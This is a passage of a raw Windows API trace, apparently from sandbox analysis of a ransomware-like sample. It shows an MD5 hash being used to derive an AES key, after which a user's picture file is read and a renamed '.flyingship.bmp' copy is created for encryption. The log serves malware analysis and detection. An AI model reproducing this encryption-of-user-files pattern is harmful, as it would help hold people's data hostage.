dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0189.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0189.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x9bda08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0189.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.982] GetProcAddress (hModule=0x74f20000, lpProcName="CryptCreateHash") returned 0x74f2df4e [0189.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0189.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0189.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0189.982] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0189.982] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.982] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0189.982] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.983] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0189.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.983] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.983] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0189.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0189.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.983] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.983] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.984] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.984] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.984] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0189.984] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.984] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0189.984] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.984] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.984] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.984] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0189.984] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0189.984] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.984] CryptDestroyHash (hHash=0x90ae18) returned 1 [0189.984] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.984] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.984] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0189.985] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0189.985] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.985] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\qs5wbgjku5.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.986] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.986] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0189.986] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.986] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0189.986] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.987] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.flyingship.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\qs5wbgjku5.flyingship.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.988] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.988] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0189.988] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.988] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0189.989] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0189.992] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x76ff, lpOverlapped=0x0) returned 1 [0189.993] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0189.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.996] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.996] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.996] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.996] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0189.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.996] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0189.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0189.997] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.997] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0189.997] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.997] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0189.997] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0189.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.997] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2678, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2678*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0189.997] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.997] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.998] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0189.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.998] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.998] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0189.998] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.998] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.998] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.998] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.998] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.998] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0189.998] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.999] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.999] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.999] HeapFree (in: hHeap=0x8a0000, 